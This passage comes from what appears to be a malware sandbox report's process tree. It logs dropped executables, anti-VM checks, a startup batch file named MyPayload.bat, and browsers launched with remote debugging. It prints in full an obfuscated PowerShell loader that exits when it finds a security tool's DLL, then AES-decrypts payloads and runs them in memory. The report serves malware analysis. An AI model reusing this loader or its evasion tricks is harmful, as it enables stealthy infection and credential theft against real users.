    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3912
  - - C:\Users\Admin\AppData\Local\Temp\1014060001\b64397a805.exe
      "C:\Users\Admin\AppData\Local\Temp\1014060001\b64397a805.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2248
  - - C:\Users\Admin\AppData\Local\Temp\1014060001\b64397a805.exe
      "C:\Users\Admin\AppData\Local\Temp\1014060001\b64397a805.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3092
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 820
      4⤵
      Program crash
      PID:3608
- - C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
    "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4412
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:3080
- - C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
    "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2820
- - C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
    "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
      "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2588
  - - C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
      "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4764
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 988
      4⤵
      Program crash
      PID:888
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:656
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5032
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3544
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        5⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2448
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4416
- - C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
    "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4680
- - C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4780
- - C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe
    "C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4784
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:4496
- - C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe
    "C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1512
- - C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe
    "C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5724
- - C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe
    "C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:6028
- - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
    "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5316
  - - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
      4⤵
      Executes dropped EXE
      PID:5524
  - - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
      4⤵
      Executes dropped EXE
      PID:5504
  - - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5508
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:1596
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cfa3cc40,0x7ff9cfa3cc4c,0x7ff9cfa3cc58
        6⤵
        
        PID:5568
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1988,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1984 /prefetch:2
        6⤵
        
        PID:3104
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1396,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2060 /prefetch:3
        6⤵
        
        PID:5744
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2000,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2300 /prefetch:8
        6⤵
        
        PID:5044
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3156 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5544
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3204 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4048
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3180,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4448 /prefetch:8
        6⤵
        
        PID:3444
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4596,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4624 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6084
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4424,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4784 /prefetch:8
        6⤵
        
        PID:3132
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4936,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3792 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1392
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4960 /prefetch:8
        6⤵
        
        PID:1136
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5080,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5216 /prefetch:8
        6⤵
        
        PID:3476
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4368,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5356 /prefetch:8
        6⤵
        
        PID:5692
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5164,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5300 /prefetch:8
        6⤵
        
        PID:764
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4720,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4712 /prefetch:8
        6⤵
        
        PID:1800
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5264,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3628 /prefetch:3
        6⤵
        
        PID:952
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3640,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3644 /prefetch:8
        6⤵
        
        PID:2988
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3608,i,99024093721237268,13428980482794848997,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3436 /prefetch:2
        6⤵
        
        PID:5940
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:244
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cfa9cc40,0x7ff9cfa9cc4c,0x7ff9cfa9cc58
        6⤵
        
        PID:3388
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2340,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2336 /prefetch:2
        6⤵
        
        PID:5348
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1396,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2380 /prefetch:3
        6⤵
        
        PID:5280
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1896,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2488 /prefetch:8
        6⤵
        
        PID:5284
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3164 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2660
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3208 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6120
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3832,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4444 /prefetch:8
        6⤵
        
        PID:688
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4424,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4636 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3228
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4508,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4448 /prefetch:8
        6⤵
        
        PID:5540
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4596,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4928 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4556
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4248,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5100 /prefetch:8
        6⤵
        
        PID:6024
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4428,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5072 /prefetch:8
        6⤵
        
        PID:4264
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5360,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5372 /prefetch:8
        6⤵
        
        PID:6072
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4540 /prefetch:8
        6⤵
        
        PID:2960
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4824,i,1729376208920375738,15714290672498025930,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4756 /prefetch:8
        6⤵
        
        PID:5780
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:2172
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9cf953cb8,0x7ff9cf953cc8,0x7ff9cf953cd8
        6⤵
        
        PID:3688
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
        6⤵
        
        PID:3404
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2336 /prefetch:3
        6⤵
        
        PID:6024
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
        6⤵
        
        PID:6056
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1920,1939479054945559643,9954321283307434509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2416
